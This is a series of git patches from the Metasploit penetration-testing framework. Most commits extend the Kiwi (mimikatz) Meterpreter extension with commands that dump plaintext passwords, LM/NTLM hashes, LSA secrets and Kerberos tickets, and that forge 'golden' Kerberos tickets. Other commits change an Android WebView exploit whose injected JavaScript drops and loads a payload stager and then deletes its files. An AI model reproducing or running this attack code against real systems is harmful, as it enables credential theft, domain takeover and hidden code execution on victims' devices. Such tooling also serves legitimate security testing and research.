Dump all TSPKG credentials to screen. + # def cmd_creds_tspkg(*args) method = Proc.new { client.kiwi.tspkg } scrape_passwords("tspkg", method) end + # + # Dump all Kerberos credentials to screen. + # def cmd_creds_kerberos(*args) method = Proc.new { client.kiwi.kerberos } scrape_passwords("kerberos", method) end +protected + def get_privs unless system_check print_status("Attempting to getprivs") @@ -323,11 +347,43 @@ class Console::CommandDispatcher::Kiwi end # - # Name for this dispatcher + # Infoke the password scraping routine on the target. # - def name - "Kiwi" + # +provider+ [String] - The name of the type of credentials to dump (used for + # display purposes only). + # +method+ [Block] - Block that contains a call to the method that invokes the + # appropriate function on the client that returns the results from Meterpreter. + # + def scrape_passwords(provider, method) + get_privs + print_status("Retrieving #{provider} credentials") + accounts = method.call + + table = Rex::Ui::Text::Table.new( + 'Header' => "#{provider} credentials", + 'Indent' => 0, + 'SortIndex' => 4, + 'Columns' => + [ + 'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash' + ] + ) + + accounts.each do |acc| + table << [ + acc[:domain], + acc[:username], + acc[:password], + "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", + acc[:lm], + acc[:ntlm] + ] + end + + print_line table.to_s + return true end + end end From f80c7b7b5162bf646f158744a87773ee28da1bdd Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 15:55:12 +1000 Subject: [PATCH 070/853] Fix silly typo --- lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 5fe2ac9de0..488c54809a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -347,7 +347,7 @@ protected end # - # Infoke the password scraping routine on the target. + # Invoke the password scraping routine on the target. # # +provider+ [String] - The name of the type of credentials to dump (used for # display purposes only). From 959cedb9b16a18d9525b9c28c64445393f12d1ba Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 16:19:05 +1000 Subject: [PATCH 071/853] Bit more code tidying --- lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 20cf637984..e780c98122 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -89,10 +89,10 @@ class Kiwi < Extension :minor => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MIN), :compname => response.get_tlv_value(TLV_TYPE_KIWI_LSA_COMPNAME), :syskey => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY)), - :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), + :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), :nt6keys => [], - :secrets => [], - :samkeys => [] + :secrets => [], + :samkeys => [] } response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k| @@ -112,7 +112,7 @@ class Kiwi < Extension } r[:current] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW)) - r[:old] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)) + r[:old] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)) result[:secrets] << r end @@ -365,8 +365,8 @@ protected return nil unless bytes s = bytes.unpack('H*')[0] parts = [ - s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], - s[10, 2] + s[8, 2], + s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], + s[10, 2] + s[8, 2], s[14, 2] + s[12, 2], s[16, 4], s[20, 12] From 84728c9fc98e17d3148a5829a19b07e53ed54198 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 16:19:23 +1000 Subject: [PATCH 072/853] Code tidying and defaulting to empty strings for table format --- .../ui/console/command_dispatcher/kiwi.rb | 32 ++++++++++++------- 1 file changed, 20 insertions(+), 12 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 488c54809a..6d1f74ecec 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -180,7 +180,9 @@ class Console::CommandDispatcher::Kiwi return true end + # default to not exporting export = false + # default to the current folder for dumping tickets export_path = "." @@kerberos_ticket_list_opts.parse(args) { |opt, idx, val| @@ -198,10 +200,10 @@ class Console::CommandDispatcher::Kiwi fields << 'Export Path' if export table = Rex::Ui::Text::Table.new( - 'Header' => "Kerberos Tickets", - 'Indent' => 0, + 'Header' => "Kerberos Tickets", + 'Indent' => 0, 'SortIndex' => 0, - 'Columns' => fields + 'Columns' => fields ) tickets.each do |t| @@ -215,6 +217,7 @@ class Console::CommandDispatcher::Kiwi "#{t[:flags].to_s(16).rjust(8, '0')} (#{flag_list})" ] + # write out each ticket to disk if export is enabled. if export path = "" if t[:raw] @@ -244,6 +247,8 @@ class Console::CommandDispatcher::Kiwi def cmd_kerberos_ticket_purge(*args) client.kiwi.keberos_ticket_purge print_good("Kerberos tickets purged") + + return true end # @@ -260,9 +265,12 @@ class Console::CommandDispatcher::Kiwi ::File.open(target, 'rb') do |f| ticket += f.read(f.stat.size) end + print_status("Using Kerberos ticket stored in #{target}, #{ticket.length} bytes") client.kiwi.kerberos_ticket_use(ticket) print_good("Kerberos ticket applied successfully") + + return true end # @@ -360,10 +368,10 @@ protected accounts = method.call table = Rex::Ui::Text::Table.new( - 'Header' => "#{provider} credentials", - 'Indent' => 0, - 'SortIndex' => 4, - 'Columns' => + 'Header' => "#{provider} credentials", + 'Indent' => 0, + 'SortIndex' => 0, + 'Columns' => [ 'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash' ] @@ -371,12 +379,12 @@ protected accounts.each do |acc| table << [ - acc[:domain], - acc[:username], - acc[:password], + acc[:domain] || "", + acc[:username] || "", + acc[:password] || "", "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", - acc[:lm], - acc[:ntlm] + acc[:lm] || "", + acc[:ntlm] || "" ] end From 11f9bfadb1ca76b7fe031c21fd4a137f8c0a1d38 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 18:40:53 +1000 Subject: [PATCH 073/853] Final bits of documentation and code tweaking --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 25 +++--- .../ui/console/command_dispatcher/kiwi.rb | 80 ++++++++++++++----- 2 files changed, 72 insertions(+), 33 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index e780c98122..8851551ad9 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -32,8 +32,7 @@ class Kiwi < Extension PWD_ID_SEK_TSPKG = 4 PWD_ID_SEK_LIVESSP = 5 PWD_ID_SEK_SSP = 6 - PWD_ID_SEK_TICKETS = 7 - PWD_ID_SEK_DPAPI = 8 + PWD_ID_SEK_DPAPI = 7 # # List of names which represent the flags that are part of the @@ -77,7 +76,7 @@ class Kiwi < Extension # # Dump the LSA secrets from the target machine. # - # Returns [Array[Hash]] + # Returns [Hash] # def lsa_dump request = Packet.create_request('kiwi_lsa_dump_secrets') @@ -126,7 +125,7 @@ class Kiwi < Extension } end - return result + result end # @@ -149,7 +148,7 @@ class Kiwi < Extension end end - return results + results end # @@ -182,7 +181,7 @@ class Kiwi < Extension } end - return results + results end # @@ -266,7 +265,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def all_pass - return scrape_passwords(PWD_ID_SEK_ALLPASS) + scrape_passwords(PWD_ID_SEK_ALLPASS) end # @@ -275,7 +274,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def wdigest - return scrape_passwords(PWD_ID_SEK_WDIGEST) + scrape_passwords(PWD_ID_SEK_WDIGEST) end # @@ -284,7 +283,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def msv - return scrape_passwords(PWD_ID_SEK_MSV) + scrape_passwords(PWD_ID_SEK_MSV) end # @@ -293,7 +292,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def livessp - return scrape_passwords(PWD_ID_SEK_LIVESSP) + scrape_passwords(PWD_ID_SEK_LIVESSP) end # @@ -302,7 +301,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def ssp - return scrape_passwords(PWD_ID_SEK_SSP) + scrape_passwords(PWD_ID_SEK_SSP) end # @@ -311,7 +310,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def tspkg - return scrape_passwords(PWD_ID_SEK_TSPKG) + scrape_passwords(PWD_ID_SEK_TSPKG) end # @@ -320,7 +319,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def kerberos - return scrape_passwords(PWD_ID_SEK_KERBEROS) + scrape_passwords(PWD_ID_SEK_KERBEROS) end protected diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 6d1f74ecec..8db656180c 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -86,9 +86,9 @@ class Console::CommandDispatcher::Kiwi # use within a table so instead we'll dump in a linear fashion print_line("Policy Subsystem : #{lsa[:major]}.#{lsa[:minor]}") if lsa[:major] - print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname] - print_line("System Key : #{lsa[:syskey]}") if lsa[:syskey] - print_line("NT5 Key : #{lsa[:nt5key]}") if lsa[:nt5key] + print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname] + print_line("System Key : #{lsa[:syskey]}") if lsa[:syskey] + print_line("NT5 Key : #{lsa[:nt5key]}") if lsa[:nt5key] print_line print_line("NT6 Key Count : #{lsa[:nt6keys].length}") @@ -109,9 +109,9 @@ class Console::CommandDispatcher::Kiwi index = i.to_s.rjust(2, ' ') print_line("#{index}. Name : #{s[:name]}") print_line("#{index}. Service : #{s[:service]}") if s[:service] - print_line("#{index}. NTLM : #{s[:ntlm]}") if s[:ntlm] + print_line("#{index}. NTLM : #{s[:ntlm]}") if s[:ntlm] print_line("#{index}. Current : #{s[:current]}") if s[:current] - print_line("#{index}. Old : #{s[:old]}") if s[:old] + print_line("#{index}. Old : #{s[:old]}") if s[:old] end end @@ -123,7 +123,7 @@ class Console::CommandDispatcher::Kiwi index = i.to_s.rjust(2, ' ') print_line("#{index}. RID : #{s[:rid]}") print_line("#{index}. User : #{s[:user]}") - print_line("#{index}. LM Hash : #{s[:lm_hash]}") if s[:lm_hash] + print_line("#{index}. LM Hash : #{s[:lm_hash]}") if s[:lm_hash] print_line("#{index}. NTLM Hash : #{s[:ntlm_hash]}") if s[:ntlm_hash] end end @@ -131,24 +131,70 @@ class Console::CommandDispatcher::Kiwi print_line end + # + # Valid options for the golden ticket creation functionality. + # + @@golden_ticket_create_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner" ], + "-u" => [ true, "Name of the user to create the ticket for" ], + "-d" => [ true, "Name of the target domain" ], + "-k" => [ true, "Kerberos ticket granting token" ], + "-t" => [ true, "Path of the file to store the ticket in" ], + "-s" => [ true, "SID of the domain" ] + ) + + # + # Output the usage for the ticket listing functionality. + # + def golden_ticket_create_usage + print( + "\nUsage: kerberos_ticket_list [-h] -u -d -k -s -t \n\n" + + "Create a golden kerberos ticket that expires in 10 years time.\n\n" + + @@golden_ticket_create_opts.usage) + end + # # Invoke the golden kerberos ticket creation functionality on the target. # def cmd_golden_ticket_create(*args) - if args.length != 5 - print_line("Usage: golden_ticket_create user domain sid tgt ticketpath") + if args.include?("-h") + golden_ticket_create_usage + return + end + + user = nil + domain = nil + sid = nil + tgt = nil + target = nil + + @@golden_ticket_create_opts.parse(args) { |opt, idx, val| + case opt + when "-u" + user = val + when "-d" + domain = val + when "-k" + tgt = val + when "-t" + target = val + when "-s" + sid = val + end + } + + # all parameters are required + unless user && domain && sid && tgt && target + golden_ticket_create_usage return end - user = args[0] - domain = args[1] - sid = args[2] - tgt = args[3] - target = args[4] ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt) + ::File.open( target, 'wb' ) do |f| f.write ticket end + print_good("Golden Kerberos ticket written to #{target}") end @@ -177,7 +223,7 @@ class Console::CommandDispatcher::Kiwi def cmd_kerberos_ticket_list(*args) if args.include?("-h") kerberos_ticket_list_usage - return true + return end # default to not exporting @@ -237,8 +283,6 @@ class Console::CommandDispatcher::Kiwi print_line print_line(table.to_s) print_line("Total Tickets : #{tickets.length}") - - return true end # @@ -247,8 +291,6 @@ class Console::CommandDispatcher::Kiwi def cmd_kerberos_ticket_purge(*args) client.kiwi.keberos_ticket_purge print_good("Kerberos tickets purged") - - return true end # @@ -269,8 +311,6 @@ class Console::CommandDispatcher::Kiwi print_status("Using Kerberos ticket stored in #{target}, #{ticket.length} bytes") client.kiwi.kerberos_ticket_use(ticket) print_good("Kerberos ticket applied successfully") - - return true end # From f9972239cfb76be42304598b12c08f637fd7c27e Mon Sep 17 00:00:00 2001 From: Tim Date: Sun, 23 Mar 2014 16:36:26 +0000 Subject: [PATCH 074/853] randomize payload filename --- .../browser/webview_addjavascriptinterface.rb | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 9024a454c8..f2e9cfaaaa 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -86,12 +86,14 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end - def dalvikstager - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libdalvikstager.so') - File.read(localfile, :mode => 'rb') + def ndkstager(stagename) + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so') + data = File.read(localfile, :mode => 'rb') + data.gsub!('PLOAD', stagename) end def js + stagename = Rex::Text.rand_text_alpha(5) %Q| function exec(obj) { // ensure that the object contains a native interface @@ -101,14 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); var runtime = m.invoke(null, null); var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; - var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}"; + var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}"; // get the process name, which will give us our data path var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; - var stagePath = path + '/stage.apk'; + var stagePath = path + '/#{stagename}.apk'; // build the library and chmod it runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); @@ -119,6 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote runtime.exec(['chmod', '700', stagePath]).waitFor(); runtime.load(libraryPath); + runtime.exec(['rm', stagePath]).waitFor(); return true; } From 25ca0552e0f5114b6f7fdb685f0934217f9543d6 Mon Sep 17 00:00:00 2001 From: Tim Date: Sun, 23 Mar 2014 17:00:29 +0000 Subject: [PATCH 075/853] cleanup files after exploit --- .../exploits/android/browser/webview_addjavascriptinterface.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index f2e9cfaaaa..cab66ca0f4 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; + var dexPath = path + '/#{stagename}.dex'; // build the library and chmod it runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); @@ -122,6 +123,8 @@ class Metasploit3 < Msf::Exploit::Remote runtime.load(libraryPath); runtime.exec(['rm', stagePath]).waitFor(); + runtime.exec(['rm', libraryPath]).waitFor(); + runtime.exec(['rm', dexPath]).waitFor(); return true; } From 0b51e7459c2e1730fb3c63cf16f8530a7f751bf8 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 24 Mar 2014 12:19:51 -0700 Subject: [PATCH 078/853] Update myBB_GetTypeDB.rb I have added detection MyBB forum. --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 95 ++++++++++++---------- 1 file changed, 53 insertions(+), 42 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 9106a4f746..46e0a0ad9a 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -4,7 +4,6 @@ ## require 'msf/core' - class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking @@ -46,49 +45,61 @@ class Metasploit3 < Msf::Auxiliary def check begin - print_status("URI: #{datastore['TARGETURI']}") - uri = normalize_uri(target_uri.path, '/index.php') - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Keep-Alive', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - rescue - print_error("Unable to connect to server.") - return Exploit::CheckCode::Unknown - end - - if res.code != 200 - print_error("Unable to query to host") - return Exploit::CheckCode::Unknown - end - - php_version = res['X-Powered-By'] - if php_version - print_good("PHP Version: #{php_version}") - else - print_status("Unknown PHP Version") - return Exploit::CheckCode::Unknown - end - _Version_server = res['Server'] - if _Version_server - print_good("Server Version: #{_Version_server}") - else - print_status("Unknown Server Version") - return Exploit::CheckCode::Unknown - end - return Exploit::CheckCode::Detected + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + end + + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') From 46f7e6060fd651abb2a99ac4d314bad6d986f5de Mon Sep 17 00:00:00 2001 From: joe Date: Tue, 25 Mar 2014 09:39:53 -0700 Subject: [PATCH 079/853] Add the updated bins from timwr. --- .../libs/armeabi-v7a/libdalvikstager.so | Bin 13436 -> 0 bytes .../{libdalvikstager.so => libndkstager.so} | Bin 13432 -> 13432 bytes .../{libdalvikstager.so => libndkstager.so} | Bin 5328 -> 5328 bytes .../{libdalvikstager.so => libndkstager.so} | Bin 5220 -> 5220 bytes data/android/meterpreter.jar | Bin 38353 -> 38353 bytes data/android/metstage.jar | Bin 1851 -> 1851 bytes data/android/shell.jar | Bin 1853 -> 1853 bytes 7 files changed, 0 insertions(+), 0 deletions(-) delete mode 100644 data/android/libs/armeabi-v7a/libdalvikstager.so rename data/android/libs/armeabi/{libdalvikstager.so => libndkstager.so} (81%) rename data/android/libs/mips/{libdalvikstager.so => libndkstager.so} (92%) rename data/android/libs/x86/{libdalvikstager.so => libndkstager.so} (59%) diff --git a/data/android/libs/armeabi-v7a/libdalvikstager.so b/data/android/libs/armeabi-v7a/libdalvikstager.so deleted file mode 100644 index 01f47d9a3704183e404d3e7b9ee7f8ca0276b9fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 13436 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 